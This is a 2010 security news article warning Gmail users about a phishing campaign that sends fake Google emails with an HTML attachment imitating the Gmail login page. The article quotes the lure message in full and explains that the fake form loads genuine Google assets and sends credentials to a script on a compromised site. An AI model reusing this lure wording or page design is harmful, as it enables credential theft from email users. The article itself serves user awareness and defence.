Sep 8, 2010 13:21 GMT  ·  By

Security researchers from Sunbelt warn of a new wave of spam emails, which masquerades as official communications from Google in an attempt to steal login credentials from Gmail users.

The fake emails are well formulated and display visual elements associated with Web search giant, such as the Google accounts logo or the copyright notice.

The messages purport to originate from the Google Team and read as follows:

"Hello,

Your Google account information is incomplete, We recommend that you update your Google account for security reasons.

Download and open the attachment in this mail and follow the direction to update your Google account."

The attached file is an HTML document called Gmail_access.html. Opening it in any browser will display a fake page almost identical to the one used to sign into Gmail.

In fact the images and other elements present on the rogue page are actually loaded from Google's real website.

"If you check the attachment source code you can see that it sucks genuine Gmail page elements," Tom Kelchner, writes on the Sunbelt blog.

The fake sign in form sends inputted data to a ServiceLoginAuth.php script hosted on an external domain, which stores it for the attackers.

"The information entered on the bogus page is snatched by a site registered to someone in Sremska Kamenica, Serbia," Kelchner explains.

However, this seems to be a legit website that has been compromised, as it runs an outdated and probably vulnerable version of the e107 content management system.

This campaign appears to have started sometime at the beginning of this month as there are reports about it on the official Gmail help forum dating back to September 1.

Fortunately, there's a simple way for users to always check if they are on the real Gmail login page or not, since the website comes with SSL enabled by default.